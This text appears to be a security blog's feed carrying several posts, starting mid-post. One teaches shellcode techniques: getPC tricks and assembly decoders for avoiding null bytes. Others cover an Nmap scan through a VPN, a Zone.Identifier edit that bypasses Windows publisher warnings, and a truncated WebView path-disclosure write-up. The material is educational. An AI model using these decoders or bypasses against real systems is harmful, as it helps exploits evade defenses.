<p>This type of constraint is indeed a classic, text book, example, but is also a common problem in real-world shellcode writing and exploitation. This is very common in vulnerabilities surrounding textual streamds, such as html, xml, telnet and others  (Often these streams can be encoded in unicode but this creates different problems).</p>
<p>In the October patch-Tuesday alone we can find  that many vulnerabilities - especially those in ms09-054  - may require dealing with these limitations (when not serving a unicode-encoded webpage). This is the case with CVE-2009-2529, with some implementations of an exploit for CVE-2009-2530.  This is probably also the case for CVE-2009-2531 and many other vulnerabilities.</p>
<p>If you have never tackled this problem before, stop reading here, and think of  how you would solve this problem.</p>
<p>The answer is of course  a decoder. there are many examples of byte-substitution decoders out there written in hundreds of lines of C.<br />
let&#8217;s see what the basic concept behind these is. We want to write code that does not concatenate any null-bytes. therefore we will obviously have to substitute the null-bytes  for something  different, or escape them. does substitution really cut it?</p>
<p>A quick histogram of all the code in kernel32.dll(or choose any other simple dll) shows us that some bytes tend to appear much less in code and printable data.<br />
we can simply histogram our shellcode (use hex workshop) and choose a magic byte to replace.<br />
[picture-histogram]</p>
<p>let&#8217;s see what the stages we need to take in order to decode our shellcode. I won&#8217;t talk about  OS-specific issues but they are mentioned<br />
- find the position we are running from (aka getPC)<br />
- deal with memory-permission issues<br />
- rewrite our code</p>
<p><strong>Locating home</strong></p>
<p>Finding the position we are running from in order to be able to decode the shellcode, we must first be able to find it. unfortunately x86 does not allow direct access to eip (ia-64 does somewhat <img src='http://blogs.securiteam.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> . we must find it indirectly. we have several methods of accomplishing this, each with benefits and drawbacks. i am already assuming no null bytes allowed.</p>
<p>We can use the CALL opcode, which will push our  position on to the stack</p>
<p>A naive method using call:<br />
_SIMPLE_CALL_GETPC_<br />
jmp START_GA;<br />
@GET_ADDR:<br />
pop edi;                // get the address that was pushed on to the stack<br />
add edi,(@START_CODE-@RET_ADDR);   //here we calculate our needed address<br />
jmp DECODE;<br />
@START_GA:<br />
call GET_ADDR;        //this will push address of @RET_ADDR on to stack. decodes as &#8220;E8FFFF&#8230; &#8221;<br />
@RET_ADDR:             //this address will be pushed<br />
@END_GA:<br />
@DECODE:<br />
[decoder goes here]<br />
@START_CODE</p>
<p>or we can use a slightly more sophisticated method:</p>
<p>_CALL_IN_TO_OPCODE_<br />
@GET_ADDR:<br />
call @AFTER_CALL- 1 (call $-1)  == &#8220;E8FFFFFFFF&#8221;<br />
@AFTER_CALL<br />
db  &#8216;0xC8&#8242;<br />
inc eax<br />
@RET_ADDR:<br />
pop edi<br />
add edi,(@START_CODE-@RET_ADDR)</p>
<p>@END_GA:<br />
@DECODE:<br />
[decoder goes here ]<br />
@START_CODE</p>
<p>What I did here is call in to the call opcode itself . this way the call will be to end-of-opcode-1, which will result in an opcode-encoding that does not contain null bytes, but 0xFFFFFFFF. this is because part of the opcode contains the jump distance and direction. in this case, -1. After the call an &#8216;dec eax&#8217; (&#8221;FFC8&#8243;) opcode will be executed.  I could have easily executed a slightly different opcode, but this is fairly harmless, and after addein an &#8216;inc eax&#8217;  this will result in a fancy NOP.</p>
<p>Another option would be to  just use an existing function that can be called(eg. from windows using syscall gateway)<br />
_CALL_EXISTING_FUNCTION_<br />
xor eax,eax<br />
push eax<br />
add eax, 0&#215;3E ; // this can be changed for anything which will not cause damage on specific OS. in this case ntclosefile(NULL);<br />
mov edx,  7FFE0301 // windows &#8220;syscall gateway&#8221; pointer<br />
dec edx<br />
mov edx, [edx]<br />
call edx        //this will perform an os-specific syscall<br />
@RET_ADDR:<br />
mov edi, [esp-4]<br />
add edi,(@START_CODE-@RET_ADDR)<br />
@END_GA:<br />
@DECODE<br />
[decoder]<br />
@START_CODE</p>
<p>That&#8217;s about it for using call. another nice trick is using some fpu opcodes</p>
<p>fld1<br />
FSTENV  [ESP-C] //push fpu state onto stack, including last address of last run fpu opcode. this can be replace by FSAVE/FSTENV/FXSAVW/some other?<br />
pop edi<br />
add edi&#8230;.</p>
<p>A completely different approach would be to copy our code to a know place. lets choose 7FFE0410 for windows (assuming no nx-bit is present, we know space is not int use, also disregarding the fact that we cannot in reality write to this address, as it is read-only from user mode).<br />
_COPY_THE_CODE_<br />
mov eax, 0&#215;7FFE0410 (7FFE0300+0&#215;110)<br />
[eax = shellcode_postion]<br />
mov dword ptr [eax], 0&#215;90909090 //NOPNOPNOPNOP - the prefect shellcode jmp/call eax</p>
<p>When copying a larger shellcode this will not be very compact/ in order to use string operations, we will have to getPC.  A variant of this method is the famous &#8220;seh method&#8221; , which essentially does the same, except it will use an interrupt to eventually jump to where the code was copied.</p>
<p><strong>Decoding</strong><br />
Now that we have found our own code base- we can replace our escaped, or replaced bytes.  these are two simple - hack decoders which are easy to implement, and are good enough in many cases. These will only work if we have a byte value which does not appear in the code/data as I discussed above.</p>
<p>XOR_IT_ALL:</p>
<p>jmp START_GA<br />
@GET_ADDR:<br />
pop edi<br />
add edi,(@END-@RET_ADDR)<br />
jmp DECODE<br />
@START_GA:<br />
call GET_ADDR</p>
<p>@RET_ADDR:<br />
@DECODE:</p>
<p>xor ecx,ecx<br />
add ecx,@END_CODE-@END_DECODER  ;smaller than 0&#215;7f. can be done multiple times<br />
mov al, 0xA7</p>
<p>@REPLACE_NEXT:<br />
mov byte ptr bl,[edi]<br />
xor bl,al<br />
inc edi<br />
mov byte ptr [edi],bl<br />
loop @REPLACE_NEXT</p>
<p>@END_DECODER :<br />
NOP<br />
NOP<br />
NOP<br />
NOP<br />
NOP<br />
@END_CODE:</p>
<p>Here we xor&#8217;d the whole code with the magic byte. If this magic byte did not exist in original code, than 0&#215;00 would not exist in encoded code. A different method:</p>
<p>SEARCH_AND_DESTROY:<br />
jmp START_GA<br />
@GET_ADDR:<br />
pop edi<br />
add edi,(@END-@RET_ADDR)<br />
jmp DECODE<br />
@START_GA:<br />
call GET_ADDR</p>
<p>@RET_ADDR:<br />
@DECODE:</p>
<p>xor ecx,ecx<br />
add ecx,@END_CODE-@END_DECODER;smaller than ox7f. can be done multiple times<br />
cld<br />
mov al, 0xA7<br />
xor dl,dl</p>
<p>@REPLACE_NEXT:</p>
<p>repnz scasb<br />
mov byte ptr [edi-1],dl<br />
test ecx,ecx<br />
jnz replace_next:<br />
@END_DECODER<br />
NOP<br />
NOP<br />
NOP<br />
NOP<br />
NOP<br />
@END_CODE</p>
<p>in order to build a more robust decoder, which supports escaping, or alphanumeric encoding it is possible to write one from scratch in assembly. Skilined has written a very elegant decoder at <a href="http://skypher.com">http://skypher.com</a>. Another option is and have a small-hack-custom-adapt decoder like the one we just wrote to decode a bigger decoder written in C.in the next upcoming post&#8230; i will show how i tried (and succeeded) in building shellcode which has gone through a process of ascii-to-unicode conversion. This shellcode will have to be written so that every second byte, and only every second byte will be a null-byte. try this at home. let me know if you have anything good.</p>
<p>leaving you with one more point for thought.. shellcode that will run on x86 and on x64..
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1329&amp;title=KISS+shellcoding+and+exploitation"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1329&amp;title=KISS+shellcoding+and+exploitation"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=KISS+shellcoding+and+exploitation&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1329"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1329"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1329&amp;title=KISS+shellcoding+and+exploitation"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1329&amp;title=KISS+shellcoding+and+exploitation"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1329&amp;title=KISS+shellcoding+and+exploitation"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1329&amp;t=KISS+shellcoding+and+exploitation"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1329&amp;title=KISS+shellcoding+and+exploitation"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1329"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=KISS+shellcoding+and+exploitation&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1329" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Expose the security holes in your products during development. <a href="http://www.beyondsecurity.com/black-box-testing.html">Black Box Testing</a> makes it safer!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1329/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Using Nmap Remotely Through F5 FirePass VPN</title>
		<link>http://blogs.securiteam.com/index.php/archives/1337</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1337#comments</comments>
		<pubDate>Fri, 11 Dec 2009 11:22:05 +0000</pubDate>
		<dc:creator>Rafel Ivgi</dc:creator>
		
		<category>Commentary</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1337</guid>
		<description><![CDATA[Well, we all use the common hacking tools of the trade like Nmap. Some of us use it on Windows and some on Linux. This post is for the people using it on Windows.
I was connected to a network remotely through the company&#8217;s F5 VPN appliance and I wanted to scan the internal network.
It looked [...]]]></description>
			<content:encoded><![CDATA[<p>Well, we all use the common hacking tools of the trade like Nmap. Some of us use it on Windows and some on Linux. This post is for the people using it on Windows.<br />
I was connected to a network remotely through the company&#8217;s F5 VPN appliance and I wanted to scan the internal network.</p>
<p>It looked like:<br />
 Microsoft Windows XP [Version 5.1.2600]<br />
 (C) Copyright 1985-2001 Microsoft Corp.</p>
<p> C:\Documents and Settings\Rafel&gt;nmap -PN -sS -p 445 192.168.1.*</p>
<p>Once I pressed &#8220;Enter&#8221; I got:<br />
 Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-11-10 00:34 Jerusalem Standard  Time<br />
 WARNING: Using raw sockets because ppp0 is not an ethernet device. This probably won&#8217;t      work on Windows.</p>
<p> pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The  system cannot  find the device specified. (20). Will wait 5 seconds then retry.</p>
<p> pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The  system cannot  find the device specified. (20). Will wait 25 seconds then retry.</p>
<p> Call to pcap_open_live(ppp0, 100, 0, 2) failed three times. Reported error: Error opening  adapter: The  system cannot find the device specified. (20)</p>
<p> There are several possible reasons for this, depending on your operating system:<br />
 LINUX: If you are getting Socket type not supported, try modprobe af_packet or  recompile  your  kernel with SOCK_PACKET enabled.</p>
<p> *BSD: If you are getting device not configured, you need to recompile your kernel with  Berkeley Packet  Filter support. If you are getting No such file or directory, try creating  the  device (eg cd /dev; MAKEDEV  ; or use mknod).</p>
<p> *WINDOWS: Nmap only supports ethernet interfaces on Windows for most operations  because Microsoft  disabled raw sockets as of Windows XP SP2. Depending on the  reason  for this error, it is possible that the &#8212; unprivileged command-line argument will  help.</p>
<p> SOLARIS: If you are trying to scan localhost or the address of an interface and are getting  &#8216;/dev/lo0: No  such file or directory&#8217; or &#8216;lo0: No DLPI device found&#8217;, complain to Sun. I  don&#8217;t think Solar is can support  advanced localhost scans. You can probably use  &#8220;-PN -sT localhost&#8221; though.</p>
<p> QUITTING!</p>
<p>Then I realized that the VPN connection was a PPP device which is probably at the top of the device type interfaces order list and Nmap is trying to use it in order to scan, which is the point of failure because Nmap on Windows without RAW sockets (means Windows XP SP2+) can only use Ethernet devices. So I try played &#8220;Imaginary Linux on Windows&#8221; and added the option &#8220;-e eth0&#8243; which specifies using the Ethernet device indexed at 0 and it worked like a charm.</p>
<p> C:\Documents and Settings\Rafel&gt;nmap -PN -sS -p 445 -e eth0 192.168.1.*</p>
<p> Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-10 00:49 Jerusalem Standard Time<br />
 Interesting ports on XXXXX (192.168.0.1):<br />
 PORT STATE SERVICE<br />
 445/tcp filtered microsoft-ds</p>
<p> Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1337&amp;title=Using+Nmap+Remotely+Through+F5+FirePass+VPN"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1337&amp;title=Using+Nmap+Remotely+Through+F5+FirePass+VPN"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=Using+Nmap+Remotely+Through+F5+FirePass+VPN&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1337"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1337"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1337&amp;title=Using+Nmap+Remotely+Through+F5+FirePass+VPN"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1337&amp;title=Using+Nmap+Remotely+Through+F5+FirePass+VPN"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1337&amp;title=Using+Nmap+Remotely+Through+F5+FirePass+VPN"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1337&amp;t=Using+Nmap+Remotely+Through+F5+FirePass+VPN"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1337&amp;title=Using+Nmap+Remotely+Through+F5+FirePass+VPN"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1337"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=Using+Nmap+Remotely+Through+F5+FirePass+VPN&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1337" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Make your website safe from SQL Injection attacks. Signup for a daily <a href="http://www.beyondsecurity.com/penetration-testing.html">penetration testing</a> to protect your network!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1337/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Bypassing Windows Unknown Publisher Verification For Web Downloaded Executables</title>
		<link>http://blogs.securiteam.com/index.php/archives/1336</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1336#comments</comments>
		<pubDate>Fri, 11 Dec 2009 10:48:42 +0000</pubDate>
		<dc:creator>Rafel Ivgi</dc:creator>
		
		<category>Commentary</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1336</guid>
		<description><![CDATA[I was in another day of jumping from a client to a client, securing another bank in Israel when my girlfriend called and said &#8220;Honey, I am at the office, I have absolutely nothing to do and I can&#8217;t connect from here to our computer at home to continue my project&#8221;. I said, O.K, let&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p>I was in another day of jumping from a client to a client, securing another bank in Israel when my girlfriend called and said &#8220;Honey, I am at the office, I have absolutely nothing to do and I can&#8217;t connect from here to our computer at home to continue my project&#8221;. I said, O.K, let&#8217;s see what we can do on a 5 minute phone call. Now just want to make it clear, my girlfriend is an Information System Instructor, she is no developer or hacker.</p>
<p>Me: &#8220;Honey, go to http://www.teamviewer.com, can you download it?&#8221;<br />
Her: &#8220;yes, but when I run the setup.exe it says something weired like &#8216;windows has blocked this software because it can&#8217;t verify the publisher&#8217; and it won&#8217;t let me install&#8221;<br />
<br /><img src="http://3.bp.blogspot.com/_18YBLFP2tdA/SyIeGz93QeI/AAAAAAAAAFg/-DTZCAO2iEc/s400/cant+verify+publisher.JPG" /><br />
Me: &#8220;O.K, Open Start-Run, type notepad and space, now click on setup.exe and drag it to the text box at Start-&gt;Run. Now add &#8216;:Zone.Identifier&#8217; just before the last quotes. What do you see?&#8221;<br />
Her: &#8220;I see something like ZoneId=3, now what?&#8221;<br />
Me: &#8220;I can&#8217;t talk, going into a meeting, try to change it to 1 or delete everything, bye bye bye&#8221;</p>
<p>After 10 minutes I get an SMS &#8220;thanks honey it worked!!!&#8221;.<br />
Well we found a bug, I wouldn&#8217;t really call it a &#8220;Privilege Escalation&#8221; but I guess you don&#8217;t have to be a hacker to bypass windows security restrictions <img src='http://blogs.securiteam.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1336&amp;title=Bypassing+Windows+Unknown+Publisher+Verification+For+Web+Downloaded+Executables"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1336&amp;title=Bypassing+Windows+Unknown+Publisher+Verification+For+Web+Downloaded+Executables"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=Bypassing+Windows+Unknown+Publisher+Verification+For+Web+Downloaded+Executables&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1336"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1336"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1336&amp;title=Bypassing+Windows+Unknown+Publisher+Verification+For+Web+Downloaded+Executables"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1336&amp;title=Bypassing+Windows+Unknown+Publisher+Verification+For+Web+Downloaded+Executables"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1336&amp;title=Bypassing+Windows+Unknown+Publisher+Verification+For+Web+Downloaded+Executables"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1336&amp;t=Bypassing+Windows+Unknown+Publisher+Verification+For+Web+Downloaded+Executables"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1336&amp;title=Bypassing+Windows+Unknown+Publisher+Verification+For+Web+Downloaded+Executables"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1336"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=Bypassing+Windows+Unknown+Publisher+Verification+For+Web+Downloaded+Executables&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1336" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Is your site safe from SQL Injection attacks? Use an <a href="http://www.beyondsecurity.com/sql-injection.html">SQL Injection Scanner</a> on a daily basis to protect your network!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1336/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Exploiting WebView through Internet Explorer to remotely discover windows directory</title>
		<link>http://blogs.securiteam.com/index.php/archives/1335</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1335#comments</comments>
		<pubDate>Fri, 11 Dec 2009 10:46:39 +0000</pubDate>
		<dc:creator>Rafel Ivgi</dc:creator>
		
		<category>Commentary</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1335</guid>
		<description><![CDATA[As for any large product, Microsoft Windows operating system is built on its previous versions code. Some of this code even goes back until Microsoft Windows 98.
In Windows 98 a new look was introduced called &#8220;WebView&#8221; which included the way folders are displayed and the way the desktop is displayed are all HTML templates which [...]]]></description>
			<content:encoded><![CDATA[<p>As for any large product, Microsoft Windows operating system is built on its previous versions code. Some of this code even goes back until Microsoft Windows 98.</p>
<p>In Windows 98 a new look was introduced called &#8220;WebView&#8221; which included the way folders are displayed and the way the desktop is displayed are all HTML templates which were also editable to the default administrative user.You can read more about it here:http://msdn.microsoft.com/en-s/library/bb776835(VS.85).aspx</p>
<p>Those HTML Templates had the extension &#8220;htt&#8221;. In order for the folder templates to function properly and being able to display the current folder, a few automatically expended variables were added to the module filtering the &#8220;htt&#8221; files. These are:<br />
%TEMPLATEDIR% (hardcoded)<br />
%THISDIRPATH% (hardcoded)<br />
%THISDIRNAME% (hardcoded)<br />
%BACKGROUNDIMAGE% (registry)<br />
%LOGOLINE% (registry)</p>
<p>This mechanism lives until today deeply inside Windows XP&#8217;s code in two modules inside the system32 folder:</p>
<pre>    1) Webvw.dll
    2) Mshtml.dll</pre>
<p>Webvw.dll is the module which is responsible for all the Webview installation and normal activity and mshtml.dll is the main module for HTML Filtering &amp; Rendering used Windows Explorer and Internet Explorer.</p>
<p>When Microsoft Windows is installed and webvw.dll is registered, it adds it CLSID and a few registry keys. The interesting ones are these:<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\<br />
WebView\TemplateMacros<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\<br />
WebView\TemplateMacros\BACKGROUNDIMAGE<br />
Default = &#8220;%SystemRoot%\Web\wvleft.bmp&#8221;<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\<br />
WebView\TemplateMacros\LOGOLINE<br />
Default = &#8220;%SystemRoot%\Web\wvline.gif&#8221;</p>
<p>Every time an htt file is rendered, without any local-remote or any zone consideration, those variables are replaced with the current system&#8217;s path.<br />
This is the code inside mimeflt.cpp which contains the bug:Lines 360 to 433:</p>
<pre>
#define REG_WEBVIEW_TEMPLATE_MACROS
TEXT("Software\Microsoft\Windows\CurrentVersion\Explorer\
WebView\TemplateMacros")

void ConvertBytesToTChar(LPCBYTE pBuf, UINT nCharSize, LPTSTR psz, int cch) {

    if (SIZEOF(char) == nCharSize) {
         SHAnsiToTChar((LPCSTR)pBuf, psz, cch);
    } else {
        ASSERT(nCharSize == SIZEOF(WCHAR));
